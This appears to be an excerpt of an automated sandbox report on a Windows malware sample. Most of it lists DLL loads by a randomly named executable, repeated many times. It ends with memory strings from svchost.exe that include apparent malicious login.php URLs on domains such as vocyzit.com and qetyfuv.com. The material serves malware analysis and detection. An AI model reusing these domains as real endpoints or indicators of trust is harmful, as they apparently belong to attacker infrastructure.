    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\arxtPs1STE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
    Source: arxtPs1STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: com.lysyvaxhttp://vocyzit.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ?\\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: com.lyxyjodhttp://qetyfuv.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2667307547.000000000757B000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1826646518.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1751652586.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000002.1852846193.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000000D.00000000.1771895214.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000011.00000000.1782019085.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000014.00000000.1788796306.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000016.00000002.1811967690.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000018.00000000.1809196113.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001A.00000000.1825252070.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001D.00000002.1875987559.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001F.00000000.1845068573.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000022.00000002.1917724112.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000027.00000002.1905806801.000000000019E000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: l\winsta.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: http://vonypom.com/login.phpndows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
